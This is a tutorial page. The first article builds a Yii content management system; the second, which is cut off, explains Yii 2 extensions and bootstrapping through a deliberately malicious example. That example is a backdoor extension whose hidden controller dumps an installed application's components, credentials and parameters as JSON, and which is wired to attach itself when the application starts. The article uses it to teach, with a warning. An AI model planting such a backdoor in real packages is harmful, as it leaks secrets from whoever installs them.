
How-To Tutorials - Server-Side Web Development

Building a Content Management System

Packt
25 Sep 2014
25 min read
In this article by Charles R. Portwood II, the author of Yii Project Blueprints, we will look at how to create a feature-complete content management system and blogging platform. (For more resources related to this topic, see here.)

Describing the project

Our CMS can be broken down into several different components:

- Users, who will be responsible for viewing and managing the content
- Content to be managed
- Categories for our content to be placed into
- Metadata to help us further define our content and users
- Search engine optimizations

Users

The first component of our application is the users who will perform all the tasks in our application. For this application, we're going to largely reuse the user database and authentication system. In this article, we'll enhance this functionality by allowing social authentication. Our CMS will allow users to register new accounts from the data provided by Twitter; after they have registered, the CMS will allow them to sign in to our application by signing in to Twitter.

To know whether a user is socially authenticated, we have to make several changes to both our database and our authentication scheme. First, we need a way to indicate whether a user is socially authenticated. Rather than hardcoding an isAuthenticatedViaTwitter column in our database, we'll create a new database table called user_metadata, a simple table that contains the user's ID, a unique key, and a value. This will allow us to store additional information about our users without having to explicitly change our users table every time we want to make a change:

```
ID INTEGER PRIMARY KEY
user_id INTEGER
key STRING
value STRING
created INTEGER
updated INTEGER
```

We'll also need to modify our UserIdentity class to allow socially authenticated users to sign in. To do this, we'll expand upon this class to create a RemoteUserIdentity class that works off the OAuth codes that Twitter (or any other third-party source that works with HybridAuth) provides to us, rather than authenticating against a username and password.

Content

At the core of our CMS is the content we'll manage. For this project, we'll manage simple blog posts that can have additional metadata associated with them. Each post will have a title, a body, an author, a category, a unique URI or slug, and an indication of whether it has been published or not. Our database structure for this table will look as follows:

```
ID INTEGER PRIMARY KEY
title STRING
body TEXT
published INTEGER
author_id INTEGER
category_id INTEGER
slug STRING
created INTEGER
updated INTEGER
```

Each post will also have one or many metadata columns that further describe the posts we'll be creating. We can use this table (we'll call it content_metadata) to have our system store information about each post automatically for us, or to add information to our posts ourselves, thereby eliminating the need to migrate our database every time we want to add a new attribute to our content:

```
ID INTEGER PRIMARY KEY
content_id INTEGER
key STRING
value STRING
created INTEGER
updated INTEGER
```

Categories

Each post will be associated with a category in our system. These categories will help us further refine our posts. As with our content, each category will have its own slug. Before either a post or a category is saved, we'll need to verify that the slug is not already in use. Our table structure will look as follows:

```
ID INTEGER PRIMARY KEY
name STRING
description TEXT
slug STRING
created INTEGER
updated INTEGER
```
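Slug generation itself isn't part of the skeleton code shown in this article, which expects slugs to be provided; if you want to derive a slug from a post's title, a helper along these lines would work. This is a hedged sketch, not code from the book's project:

```php
// Hypothetical helper: derive a URL-friendly slug from a title.
// Not part of the book's skeleton project.
function slugify($title)
{
    $slug = strtolower(trim($title));
    // Collapse runs of non-alphanumeric characters into single dashes
    $slug = preg_replace('/[^a-z0-9]+/', '-', $slug);
    return trim($slug, '-');
}

// slugify('My Awesome Article!') returns 'my-awesome-article'
```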
Search engine optimizations

The last core component of our application is optimization for search engines so that our content can be indexed quickly. SEO is important because it increases our discoverability and availability both on search engines and in other marketing materials. In our application, there are a couple of things we'll do to improve our SEO.

The first SEO enhancement we'll add is a sitemap.xml file, which we can submit to popular search engines to index. Rather than crawling our content, search engines can very quickly index our sitemap.xml file, which means our content will show up in search engines faster.

The second enhancement is the slugs we discussed earlier. Slugs allow us to indicate what a particular post is about directly from the URL. So rather than a URL that looks like http://chapter6.example.com/content/post/id/5, we can have URLs that look like http://chapter6.example.com/my-awesome-article. These types of URLs allow search engines and our users to know what our content is about without even looking at the content itself, such as when a user is browsing through their bookmarks or a search engine's results.

Initializing the project

To provide us with a common starting ground, a skeleton project has been included with the project resources for this article. Included with this skeleton project are the necessary migrations, data files, controllers, and views to get us started with developing, as well as the user authentication classes. Copy this skeleton project to your web server, configure it so that it responds to chapter6.example.com as outlined at the beginning of the article, and then perform the following steps to make sure everything is set up:

1. Adjust the permissions on the assets and protected/runtime folders so that they are writable by your web server.

2. In this article, we'll once again use the latest version of MySQL (at the time of writing, MySQL 5.6). Make sure that your MySQL server is set up and running on your server. Then, create a username, password, and database for our project to use, and update your protected/config/main.php file accordingly. For simplicity, you can use ch6_cms for each value.

3. Install our Composer dependencies:

```
composer install
```

4. Run the migrate command and install our mock data:

```
php protected/yiic.php migrate up --interactive=0
psql ch6_cms -f protected/data/postgres.sql
```

5. Finally, add your SendGrid credentials to your protected/config/params.php file:

```php
'username' => '<username>',
'password' => '<password>',
'from' => '[email protected]'
```

If everything is loaded correctly, you should see a 404 page.

Exploring the skeleton project

There is actually a lot going on in the background to make this work, even if it is just a 404 error. Before we start doing any development, let's take a look at a few of the classes that have been provided in our skeleton project's protected/components folder.

Extending models from a common class

The first class that has been provided to us is an ActiveRecord extension called CMSActiveRecord, which all of our models will stem from. This class allows us to reduce the amount of code that we have to write in each class.
For now, we'll simply add CTimestampBehavior and an afterFind() method that stores the old attributes, for the time the need arises to compare the changed attributes with the new attributes:

```php
class CMSActiveRecord extends CActiveRecord
{
    public $_oldAttributes = array();

    public function behaviors()
    {
        return array(
            'CTimestampBehavior' => array(
                'class' => 'zii.behaviors.CTimestampBehavior',
                'createAttribute' => 'created',
                'updateAttribute' => 'updated',
                'setUpdateOnCreate' => true
            )
        );
    }

    public function afterFind()
    {
        if ($this !== NULL)
            $this->_oldAttributes = $this->attributes;
        return parent::afterFind();
    }
}
```

Creating a custom validator for slugs

Since both the Content and Category classes have slugs, we'll need a custom validator in each class that ensures the slug is not already in use by either a post or a category. To do this, we have another class called CMSSlugActiveRecord that extends CMSActiveRecord with a validateSlug() method, which we'll implement as follows:

```php
class CMSSlugActiveRecord extends CMSActiveRecord
{
    public function validateSlug($attributes, $params)
    {
        // Fetch any records that have that slug
        $content = Content::model()->findByAttributes(array('slug' => $this->slug));
        $category = Category::model()->findByAttributes(array('slug' => $this->slug));

        // $$class below resolves to either $content or $category,
        // depending on the class of the current model
        $class = strtolower(get_class($this));

        if ($content == NULL && $category == NULL)
            return true;
        else if (($content == NULL && $category != NULL) || ($content != NULL && $category == NULL))
        {
            $this->addError('slug', 'That slug is already in use');
            return false;
        }
        else
        {
            if ($this->id == $$class->id)
                return true;
        }

        $this->addError('slug', 'That slug is already in use');
        return false;
    }
}
```

This implementation simply checks the database for any item with that slug. If nothing is found, or if the current item is the item being modified, the validator returns true. Otherwise, it adds an error to the slug attribute and returns false. Both our Content model and our Category model will extend from this class.

View management with themes

One of the largest challenges of working with larger applications is changing their appearance without locking functionality into our views. One way to further separate our business logic from our presentation logic is to use themes. Using themes in Yii, we can dynamically change the presentation layer of our application simply by utilizing the Yii::app()->setTheme('themename') method. Once this method is called, Yii will look for view files in themes/themename/views rather than protected/views. Throughout the rest of the article, we'll be adding views to a custom theme called main, which is located in the themes folder.

To set this theme globally, we'll create a custom class called CMSController, which all of our controllers will extend from. For now, our theme name will be hardcoded within our application. This value could easily be retrieved from a database, though, allowing us to dynamically change themes from a cached or database value rather than changing it in our controller. Have a look at the following lines of code:

```php
class CMSController extends CController
{
    public function beforeAction($action)
    {
        Yii::app()->setTheme('main');
        return parent::beforeAction($action);
    }
}
```
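As a hedged illustration of the database-driven variation just mentioned (this is not part of the book's code, and the 'site.theme' cache key is an assumption), beforeAction() could resolve the theme name at runtime and fall back to main:

```php
// Hypothetical variation: resolve the theme name from the cache instead of
// hardcoding it. The 'site.theme' cache key is made up for this sketch.
class CMSController extends CController
{
    public function beforeAction($action)
    {
        $theme = Yii::app()->cache->get('site.theme');
        // CCache::get() returns false on a cache miss
        Yii::app()->setTheme($theme !== false ? $theme : 'main');
        return parent::beforeAction($action);
    }
}
```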
Truly dynamic routing

In our previous applications, we had long, boring URLs with lots of IDs and parameters in them. These URLs provided a terrible user experience and prevented search engines and users from knowing what the content was about at a glance, which in turn would hurt our SEO rankings on many search engines. To get around this, we're going to heavily modify our UrlManager class to allow truly dynamic routing, which means that every time we create or update a post or a category, our URL rules will be updated.

Telling Yii to use our custom UrlManager

Before we can start working on our controllers, we need to create a custom UrlManager to handle the routing of our content so that we can access it by its slug. The steps are as follows:

1. The first change we need to make is to update the components section of our protected/config/main.php file. This tells Yii which class to use for the UrlManager component:

```php
'urlManager' => array(
    'class' => 'application.components.CMSUrlManager',
    'urlFormat' => 'path',
    'showScriptName' => false
)
```

2. Next, within our protected/components folder, we need to create CMSUrlManager.php:

```php
class CMSUrlManager extends CUrlManager {}
```

CUrlManager works by populating a rules array. When Yii is bootstrapped, it will trigger the processRules() method to determine which route should be executed. We can overload this method to inject our own rules, which will ensure that the action we want to be executed is executed.

To get started, let's first define a set of default routes that we want loaded. The routes defined in the following code snippet will allow pagination on our search and home pages, enable a static path for our sitemap.xml file, and provide a route for HybridAuth to use for social authentication:

```php
public $defaultRules = array(
    '/sitemap.xml' => '/content/sitemap',
    '/search/<page:\d+>' => '/content/search',
    '/search' => '/content/search',
    '/blog/<page:\d+>' => '/content/index',
    '/blog' => '/content/index',
    '/' => '/content/index',
    '/hybrid/<provider:\w+>' => '/hybrid/index',
);
```

Then, we'll implement our processRules() method:

```php
protected function processRules() {}
```

CUrlManager already exposes a public rules property that we can modify, so we'll inject our own rules into it. This is the same property that can be accessed from within our config file. Since processRules() gets called on every page load, we'll also utilize caching so that our rules don't have to be generated every time. We'll start by trying to load any pregenerated rules from our cache, depending on whether we are in debug mode or not:

```php
$this->rules = !YII_DEBUG ? Yii::app()->cache->get('Routes') : array();
```

If the rules we get back are already set up, we'll simply return them; otherwise, we'll generate the rules, put them into our cache, and then append our basic URL rules:

```php
if ($this->rules == false || empty($this->rules))
{
    $this->rules = array();
    $this->rules = $this->generateClientRules();
    $this->rules = CMap::mergeArray($this->addRSSRules(), $this->rules);
    Yii::app()->cache->set('Routes', $this->rules);
}

$this->rules['<controller:\w+>/<action:\w+>/<id:\w+>'] = '/';
$this->rules['<controller:\w+>/<action:\w+>'] = '/';

return parent::processRules();
```

For abstraction purposes, within our processRules() method, we've utilized two methods we'll need to create: generateClientRules(), which generates the rules for content and categories, and addRSSRules(), which generates the RSS routes for each category.
The first method, generateClientRules(), simply merges the default rules we defined earlier with the rules generated from our content and categories, which are populated by the generateRules() method:

```php
private function generateClientRules()
{
    $rules = CMap::mergeArray($this->defaultRules, $this->rules);
    return CMap::mergeArray($this->generateRules(), $rules);
}

private function generateRules()
{
    return CMap::mergeArray($this->generateContentRules(), $this->generateCategoryRules());
}
```

The generateRules() method that we just defined actually calls the methods that build our routes. Each route is a key-value pair that takes the following form:

```php
array(
    '<slug>' => '<controller>/<action>/id/<id>'
)
```

Content rules will consist of every entry that is published. Have a look at the following code:

```php
private function generateContentRules()
{
    $rules = array();

    $criteria = new CDbCriteria;
    $criteria->addCondition('published = 1');
    $content = Content::model()->findAll($criteria);

    foreach ($content as $el)
    {
        if ($el->slug == NULL)
            continue;

        $pageRule = $el->slug . '/<page:\d+>';
        $rule = $el->slug;

        // The home slug '/' maps to the empty route
        if ($el->slug == '/')
            $pageRule = $rule = '';

        $rules[$pageRule] = "content/view/id/{$el->id}";
        $rules[$rule] = "content/view/id/{$el->id}";
    }

    return $rules;
}
```

Our category rules will consist of all the categories in our database. Have a look at the following code:

```php
private function generateCategoryRules()
{
    $rules = array();
    $categories = Category::model()->findAll();

    foreach ($categories as $el)
    {
        if ($el->slug == NULL)
            continue;

        $pageRule = $el->slug . '/<page:\d+>';
        $rule = $el->slug;

        if ($el->slug == '/')
            $pageRule = $rule = '';

        $rules[$pageRule] = "category/index/id/{$el->id}";
        $rules[$rule] = "category/index/id/{$el->id}";
    }

    return $rules;
}
```

Finally, we'll add our RSS rules, which allow RSS readers to read all content for the entire site or for a particular category:

```php
private function addRSSRules()
{
    $routes = array();
    $categories = Category::model()->findAll();

    foreach ($categories as $category)
        $routes[$category->slug . '.rss'] = "category/rss/id/{$category->id}";

    $routes['blog.rss'] = '/category/rss';
    return $routes;
}
```
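To make the output concrete, here is an illustrative example (with made-up IDs and slugs, not data from the book's sample database) of the rules these generators produce:

```php
// Illustrative only: rules produced for a published post (id 5,
// slug 'my-awesome-article') and a category (id 2, slug 'news').
array(
    'my-awesome-article/<page:\d+>' => 'content/view/id/5',
    'my-awesome-article'            => 'content/view/id/5',
    'news/<page:\d+>'               => 'category/index/id/2',
    'news'                          => 'category/index/id/2',
    'news.rss'                      => 'category/rss/id/2',
    'blog.rss'                      => '/category/rss',
);
```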
Displaying and managing content

Now that Yii knows how to route our content, we can begin work on displaying and managing it. Begin by creating a new controller called ContentController in protected/controllers that extends CMSController:

```php
class ContentController extends CMSController {}
```

To start with, we'll define our accessRules() method and the default layout that we're going to use:

```php
public $layout = 'default';

public function filters()
{
    return array(
        'accessControl',
    );
}

public function accessRules()
{
    return array(
        array('allow',
            'actions' => array('index', 'view', 'search'),
            'users' => array('*')
        ),
        array('allow',
            'actions' => array('admin', 'save', 'delete'),
            'users' => array('@'),
            'expression' => 'Yii::app()->user->role==2'
        ),
        array('deny', // deny all other users
            'users' => array('*'),
        ),
    );
}
```

Rendering the sitemap

The first method we'll implement is our sitemap action. In our ContentController, create a new method called actionSitemap():

```php
public function actionSitemap() {}
```

The steps to be performed are as follows:

1. Since sitemaps come in XML format, we'll start by disabling the WebLogRoute defined in our protected/config/main.php file. This ensures that our XML validates when search engines attempt to index it:

```php
Yii::app()->log->routes[0]->enabled = false;
```

2. We'll then send the appropriate XML headers, disable the rendering of the layout, and flush any content that may have been queued to be sent to the browser:

```php
ob_end_clean();
header('Content-type: text/xml; charset=utf-8');
$this->layout = false;
```

3. Then, we'll load all the published entries and categories and send them to our sitemap view:

```php
$content = Content::model()->findAllByAttributes(array('published' => 1));
$categories = Category::model()->findAll();
$this->renderPartial('sitemap', array(
    'content' => $content,
    'categories' => $categories,
    'url' => 'http://' . Yii::app()->request->serverName . Yii::app()->baseUrl
));
```

4. Finally, we have two options for rendering this view. We can either make it part of our theme in themes/main/views/content/sitemap.php, or place it in protected/views/content/sitemap.php. Since a sitemap's structure is unlikely to change, let's put it in the protected/views folder:

```php
<?php echo '<?xml version="1.0" encoding="UTF-8"?>'; ?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<?php foreach ($content as $v): ?>
    <url>
        <loc><?php echo $url . '/' . htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc>
        <lastmod><?php echo date('c', strtotime($v['updated'])); ?></lastmod>
        <changefreq>weekly</changefreq>
        <priority>1</priority>
    </url>
<?php endforeach; ?>
<?php foreach ($categories as $v): ?>
    <url>
        <loc><?php echo $url . '/' . htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc>
        <lastmod><?php echo date('c', strtotime($v['updated'])); ?></lastmod>
        <changefreq>weekly</changefreq>
        <priority>0.7</priority>
    </url>
<?php endforeach; ?>
</urlset>
```

You can now load http://chapter6.example.com/sitemap.xml in your browser to see the sitemap. Before you make your site live, be sure to submit this file to search engines for them to index.

Displaying a list view of content

Next, we'll implement the actions necessary to display all of our content as well as a particular post. We'll start by providing a paginated view of our posts. Since CListView and the Content model's search() method already provide this functionality, we can utilize those classes to generate and display this data.

To begin with, open protected/models/Content.php and modify the return value of the search() method as follows. This ensures that Yii's pagination uses the correct variable in our CListView and tells Yii how many results to load per page:

```php
return new CActiveDataProvider($this, array(
    'criteria' => $criteria,
    'pagination' => array(
        'pageSize' => 5,
        'pageVar' => 'page'
    )
));
```

Next, implement the actionIndex() method with a $page parameter.
We've already told our UrlManager how to handle this, which means we'll get pretty URIs for pagination (for example, /blog, /blog/2, /blog/3, and so on):

```php
public function actionIndex($page = 1)
{
    // Model search without $_GET params
    $model = new Content('search');
    $model->unsetAttributes();
    $model->published = 1;

    $this->render('//content/all', array(
        'dataprovider' => $model->search()
    ));
}
```

Then we'll create a view in themes/main/views/content/all.php that displays the data within our data provider:

```php
<?php $this->widget('zii.widgets.CListView', array(
    'dataProvider' => $dataprovider,
    'itemView' => '//content/list',
    'summaryText' => '',
    'pager' => array(
        'htmlOptions' => array('class' => 'pager'),
        'header' => '',
        'firstPageCssClass' => 'hide',
        'lastPageCssClass' => 'hide',
        'maxButtonCount' => 0
    )
)); ?>
```

Finally, copy the themes/main/views/content/list.php item view from the project resources folder so that our views can render. Since our database has already been populated with some sample data, you can start playing around with the results right away.

Displaying content by ID

Since our routing rules are already set up, displaying our content is extremely simple. All we have to do is search for a published model with the ID passed to the view action and render it:

```php
public function actionView($id = NULL)
{
    // Retrieve the data
    $content = Content::model()->findByPk($id);

    // beforeViewAction should catch this
    if ($content == NULL || !$content->published)
        throw new CHttpException(404, 'The article you specified does not exist.');

    $this->render('view', array(
        'id' => $id,
        'post' => $content
    ));
}
```

After copying themes/main/views/content/view.php from the project resources folder into your project, you'll be able to click through to a particular post from the home page.

In its present form, this action has introduced an interesting side effect that could negatively impact our SEO rankings on search engines: the same entry can now be accessed from two URIs. For example, http://chapter6.example.com/content/view/id/1 and http://chapter6.example.com/quis-condimentum-tortor now bring up the same post. Fortunately, correcting this bug is fairly easy. Since the goal of our slugs is to provide more descriptive URIs, we'll simply block access to the view if a user tries to access it from the non-slugged URI.

We'll do this by creating a new method called beforeViewAction() that takes the entry ID as a parameter and gets called right after the actionView() method is invoked. This private method will simply check the URI from CHttpRequest to determine how actionView() was accessed, and return a 404 if it's not through our beautiful slugs:

```php
private function beforeViewAction($id = NULL)
{
    // If we do not have an ID, consider it to be null and throw a 404 error
    if ($id == NULL)
        throw new CHttpException(404, 'The specified post cannot be found.');

    // Retrieve the HTTP request
    $r = new CHttpRequest();

    // Retrieve the actual URI
    $requestUri = str_replace($r->baseUrl, '', $r->requestUri);

    // Retrieve the route
    $route = '/' . $this->getRoute() . '/' . $id;
    $requestUri = preg_replace('/\?(.*)/', '', $requestUri);

    // If the route and the URI are the same, then a direct access attempt
    // was made, and we need to block access to the controller
    if ($requestUri == $route)
        throw new CHttpException(404, 'The requested post cannot be found.');

    return str_replace($r->baseUrl, '', $r->requestUri);
}
```
Then, right after our actionView() starts, we can simultaneously set the correct return URL and block access to the content if it wasn't accessed through the slug, as follows:

```php
Yii::app()->user->setReturnUrl($this->beforeViewAction($id));
```

Adding comments to our CMS with Disqus

Presently, our content is only informative in nature; we have no way for our users to tell us what they thought about an entry. To encourage engagement, we can add a commenting system to our CMS to further engage with our readers. Rather than writing our own commenting system, we can leverage Disqus, a free, third-party commenting system. Even though Disqus comments are implemented in JavaScript, we can create a custom widget wrapper to display them on our site. The steps are as follows:

1. To begin with, log in to the Disqus account you created at the beginning of this article, as outlined in the prerequisites section. Then, navigate to http://disqus.com/admin/create/ and fill out the form fields as prompted.

2. Then, add a disqus section to your protected/config/params.php file with your site shortname:

```php
'disqus' => array(
    'shortname' => 'ch6disqusexample',
)
```

3. Next, create a new widget in protected/components called DisqusWidget.php. This widget will be loaded within our view and populated by our Content model:

```php
class DisqusWidget extends CWidget {}
```

4. Begin by specifying the public properties that our view will be able to inject into, as follows:

```php
public $shortname = NULL;
public $identifier = NULL;
public $url = NULL;
public $title = NULL;
```

5. Then, overload the init() method to load the Disqus JavaScript callback and populate the JavaScript variables with the values passed to the widget, as follows:

```php
public function init()
{
    parent::init();

    if ($this->shortname == NULL)
        throw new CHttpException(500, 'Disqus shortname is required');

    echo "<div id='disqus_thread'></div>";

    Yii::app()->clientScript->registerScript('disqus', "
        var disqus_shortname = '{$this->shortname}';
        var disqus_identifier = '{$this->identifier}';
        var disqus_url = '{$this->url}';
        var disqus_title = '{$this->title}';

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    ");
}
```

6. Finally, within our themes/main/views/content/view.php file, load the widget as follows:

```php
<?php $this->widget('DisqusWidget', array(
    'shortname' => Yii::app()->params['includes']['disqus']['shortname'],
    'url' => $this->createAbsoluteUrl('/' . $post->slug),
    'title' => $post->title,
    'identifier' => $post->id
)); ?>
```

Now, when you load any given post, Disqus comments will also be loaded with that post. Go ahead and give it a try!
Searching for content

Next, we'll implement a search method so that our users can search for posts. To do this, we'll create an instance of CActiveDataProvider and pass that data to our themes/main/views/content/all.php view to be rendered and paginated:

```php
public function actionSearch()
{
    $param = Yii::app()->request->getParam('q');

    $criteria = new CDbCriteria;
    // Third parameter is $escape; 'OR' is the operator
    $criteria->addSearchCondition('title', $param, true, 'OR');
    $criteria->addSearchCondition('body', $param, true, 'OR');

    $dataprovider = new CActiveDataProvider('Content', array(
        'criteria' => $criteria,
        'pagination' => array(
            'pageSize' => 5,
            'pageVar' => 'page'
        )
    ));

    $this->render('//content/all', array('dataprovider' => $dataprovider));
}
```

Since our view file already exists, we can now search for content in our CMS.

Managing content

Next, we'll implement a basic set of management tools that will allow us to create, update, and delete entries.

1. We'll start by defining our loadModel() method and the actionDelete() method:

```php
private function loadModel($id = NULL)
{
    if ($id == NULL)
        throw new CHttpException(404, 'No entry with that ID exists');

    $model = Content::model()->findByPk($id);

    if ($model == NULL)
        throw new CHttpException(404, 'No entry with that ID exists');

    return $model;
}

public function actionDelete($id)
{
    $this->loadModel($id)->delete();
    $this->redirect($this->createUrl('content/admin'));
}
```

2. Next, we can implement our admin action, which allows us to view all the content in our system and create new entries. Be sure to copy the themes/main/views/content/admin.php file from the project resources folder into your project before using this view:

```php
public function actionAdmin()
{
    $model = new Content('search');
    $model->unsetAttributes();

    if (isset($_GET['Content']))
        $model->attributes = $_GET;

    $this->render('admin', array('model' => $model));
}
```

3. Finally, we'll implement a save action to create and update entries. Saving content will simply pass it through our Content model's validation rules. The only override we'll add is ensuring that the author is set to the user editing the entry. Before using this view, be sure to copy the themes/main/views/content/save.php file from the project resources folder into your project:

```php
public function actionSave($id = NULL)
{
    if ($id == NULL)
        $model = new Content;
    else
        $model = $this->loadModel($id);

    if (isset($_POST['Content']))
    {
        $model->attributes = $_POST['Content'];
        $model->author_id = Yii::app()->user->id;

        if ($model->save())
        {
            Yii::app()->user->setFlash('info', 'The article was saved');
            $this->redirect($this->createUrl('content/admin'));
        }
    }

    $this->render('save', array('model' => $model));
}
```

At this point, you can log in to the system using the credentials provided in the following table and start managing entries:

| Username | Password |
| --- | --- |
| [email protected] | test |
| [email protected] | test |

Summary

In this article, we dug deeper into the Yii framework by manipulating our CUrlManager class to generate completely dynamic and clean URIs. We also covered the use of Yii's built-in theming to dynamically change the frontend appearance of our site by simply changing a configuration value.

Resources for Article:

Further resources on this subject:
- Creating an Extension in Yii 2 [Article]
- Yii 1.1: Using Zii Components [Article]
- Agile with Yii 1.1 and PHP5: The TrackStar Application [Article]

Creating an Extension in Yii 2

Packt
24 Sep 2014
22 min read
In this article by Mark Safronov, co-author of the book Web Application Development with Yii 2 and PHP, we'll learn to create our own extension in a way that makes it simple to install. There is a process we have to follow, though, and some preparation will be needed to wire up your classes to the Yii application. The whole article is devoted to this process. (For more resources related to this topic, see here.)

Extension idea

So, how are we going to extend the Yii 2 framework as an example for this article? Let's become vile this time and make a malicious extension, which will provide a sort of phishing backdoor for us. Never do exactly the thing we'll describe in this article! It won't give you instant access to the attacked website anyway, but a skilled black hat hacker can easily get enough information from it to achieve total control over your application.

The idea is this: our extension will provide a special route (a controller with a single action inside) that dumps the complete application configuration to the web page. Let's say it'll be reachable from the route /app-info/configuration. We cannot, however, just get the contents of the configuration file itself, at least not reliably. At the point where we can attach ourselves to the application instance, the original configuration array is inaccessible, and even if it were accessible, we couldn't be sure where it came from anyway. So, we'll inspect the runtime status of the application and return the most important pieces of information we can fetch at the stage of the controller action resolution. That's the exact payload we want to introduce:

```php
public function actionConfiguration()
{
    $app = Yii::$app;
    $config = [
        'components' => $app->components,
        'basePath' => $app->basePath,
        'params' => $app->params,
        'aliases' => Yii::$aliases
    ];
    return \yii\helpers\Json::encode($config);
}
```

The preceding code is the core of the extension and is assumed in the following sections. In fact, if you know the value of the basePath setting of the application, a list of its aliases, the settings for its components (among which the DB connection may reside), and all the custom parameters that developers set manually, you can map the target application quite reliably. Given that you know all the credentials this way, you now have an enormous amount of highly valuable information about the application. All you need to do is make the user install this extension.

Creating the extension contents

Our plan is as follows:

- We will develop our extension in a folder separate from our example CRM application.
- The extension will be named yii2-malicious, to be consistent with the naming of other Yii 2 extensions.
- Given the kind of payload we saw earlier, our extension will consist of a single controller and some special wiring code (which we haven't learned about yet) to automatically attach this controller to the application.
- Finally, for this subproject to be a true Yii 2 extension and not just some random library, we want it to be installable in the same way as other Yii 2 extensions.

Preparing the boilerplate code for the extension

Let's make a separate directory, initialize the Git repository there, and add the AppInfoController to it.
In the bash command line, this can be achieved by the following commands:

```
$ mkdir yii2-malicious && cd $_
$ git init
$ > AppInfoController.php
```

Inside the AppInfoController.php file, we'll write the usual boilerplate code for a Yii 2 controller, as follows:

```php
namespace malicious;

use yii\web\Controller;

class AppInfoController extends Controller
{
    // Action here
}
```

Put the action defined in the preceding code snippet inside this controller and we're done with it. Note the namespace: it is not the same as the folder this controller is in, which does not follow our usual autoloading rules. We will see later in this article that this is not an issue, because of how Yii 2 treats the autoloading of classes from extensions.

Now, this controller needs to be wired to the application somehow. We already know that the application has a special property called controllerMap, in which we can manually attach controller classes. However, how do we do this automatically, better yet, right at application startup time? Yii 2 has a special feature called bootstrapping to support exactly this: attaching some activity to the beginning of the application lifetime (not the very beginning, but before handling the request for sure). This feature is tightly related to the concept of extensions in Yii 2, so it's a perfect time to explain it.

FEATURE – bootstrapping

To explain the bootstrapping concept in short: you can declare some components of the application in the yii\base\Application::$bootstrap property, and they'll be properly instantiated at the start of the application. If any of these components implements the BootstrapInterface interface, its bootstrap() method will be called, so you get the application initialization enhancement for free. Let's elaborate on this.

The yii\base\Application::$bootstrap property holds an array of generic values that you tell the framework to initialize beforehand. It's basically an improvement over the preload concept from Yii 1.x. You can specify four kinds of values to initialize, as shown in the sketch after this list:

- The ID of an application component
- The ID of some module
- A class name
- A configuration array

If it's the ID of a component, this component is fully initialized. If it's the ID of a module, this module is fully initialized. This matters greatly because Yii 2 employs lazy loading for the components and modules system, and they are usually initialized only when explicitly referenced. Being bootstrapped means that their initialization, regardless of whether it's slow or resource-consuming, always happens, and always happens at the start of the application. If you have a component and a module with identical IDs, the component will be initialized and the module will not be initialized!

If the value in the bootstrap property is a class name or a configuration array, then an instance of the class in question is created using the yii\BaseYii::createObject() facility. The instance created will be thrown away immediately if it doesn't implement the yii\base\BootstrapInterface interface. If it does, its bootstrap() method will be called; then the object is thrown away.

So, what's the effect of this bootstrapping feature? We already used it while installing the debug extension. We had to bootstrap the debug module using its ID, for it to be able to attach the event handler that gives us the debug toolbar at the bottom of each page of our web application. This feature is indispensable if you need to be sure that some activity will always take place at the start of the application lifetime. The BootstrapInterface interface is basically an incarnation of the command pattern. By implementing this interface, we gain the ability to attach any activity, not necessarily bound to a component or module, to the application initialization.
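Put together in configuration form, the four kinds of bootstrap values look roughly like this. The component and module IDs are typical ones, and the Warmup class is made up for this illustration; none of it comes from the article's project:

```php
// Illustrative application config snippet; 'log' and 'debug' are common
// component/module IDs, and app\components\Warmup is a hypothetical class.
'bootstrap' => [
    'log',                              // the ID of an application component
    'debug',                            // the ID of a module
    'app\components\Warmup',            // a class name
    [                                   // a configuration array
        'class' => 'app\components\Warmup',
        'someProperty' => 'value',
    ],
],
```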
FEATURE – extension registering

The bootstrapping feature is repeated in the handling of the yii\base\Application::$extensions property. This property is the only place where the concept of an extension can be seen in the Yii framework. Extensions in this property are described as a list of arrays, and each of them should have the following fields:

- name: This field holds the name of the extension.
- version: This field holds the extension's version (nothing will really check it, so it's only for reference).
- bootstrap: This field holds the data for this extension's bootstrap. It is filled with the same elements as Yii::$app->bootstrap, described previously, and has the same semantics.
- alias: This field holds the mapping from Yii 2 path aliases to real directory paths.

When the application registers an extension, it does two things, in the following order:

1. It registers the aliases from the extension, using the Yii::setAlias() method.
2. It initializes whatever is mentioned in the bootstrap of the extension, in exactly the same way as described in the previous section.

Note that the extensions' bootstraps are processed before the application's bootstraps.

Registering aliases is crucial to the whole concept of extensions in Yii 2, because of the Yii 2 PSR-4 compatible autoloader. Here is a quote from the documentation block for the yii\BaseYii::autoload() method:

"If the class is namespaced (e.g. yii\base\Component), it will attempt to include the file associated with the corresponding path alias (e.g. @yii/base/Component.php). This autoloader allows loading classes that follow the PSR-4 standard and have its top-level namespace or sub-namespaces defined as path aliases."

The PSR-4 standard is available online at http://www.php-fig.org/psr/psr-4/. Given that behavior, the alias setting of the extension is basically a way to tell the autoloader the name of the top-level namespace of the classes in your extension's code base. Let's say you have the following value for the alias setting of your extension:

```php
"alias" => ["@companyname/extensionname" => "/some/absolute/path"]
```

If you have the /some/absolute/path/subdirectory/ClassName.php file and, according to PSR-4 rules, it contains the class whose fully qualified name is companyname\extensionname\subdirectory\ClassName, Yii 2 will be able to autoload this class without problems.
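In other words, once the alias is registered, class resolution proceeds like this. This is a hedged illustration of the mechanism described above, not code from the article:

```php
// Register the alias, as the extension-registration step does internally.
Yii::setAlias('@companyname/extensionname', '/some/absolute/path');

// Instantiating the class below makes the autoloader look for the file
// /some/absolute/path/subdirectory/ClassName.php, per PSR-4.
$object = new \companyname\extensionname\subdirectory\ClassName();
```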
Making the bootstrap for our extension – hideous attachment of a controller

We have a controller already prepared in our extension. Now we want this controller to be automatically attached to the application under attack when the extension is processed. This is achievable using the bootstrapping feature we just learned about. Let's create the malicious\Bootstrap class for this cause inside the code base of our extension, with the following boilerplate code:

```php
<?php

namespace malicious;

use yii\base\BootstrapInterface;

class Bootstrap implements BootstrapInterface
{
    /** @param \yii\web\Application $app */
    public function bootstrap($app)
    {
        // Controller addition will be here.
    }
}
```

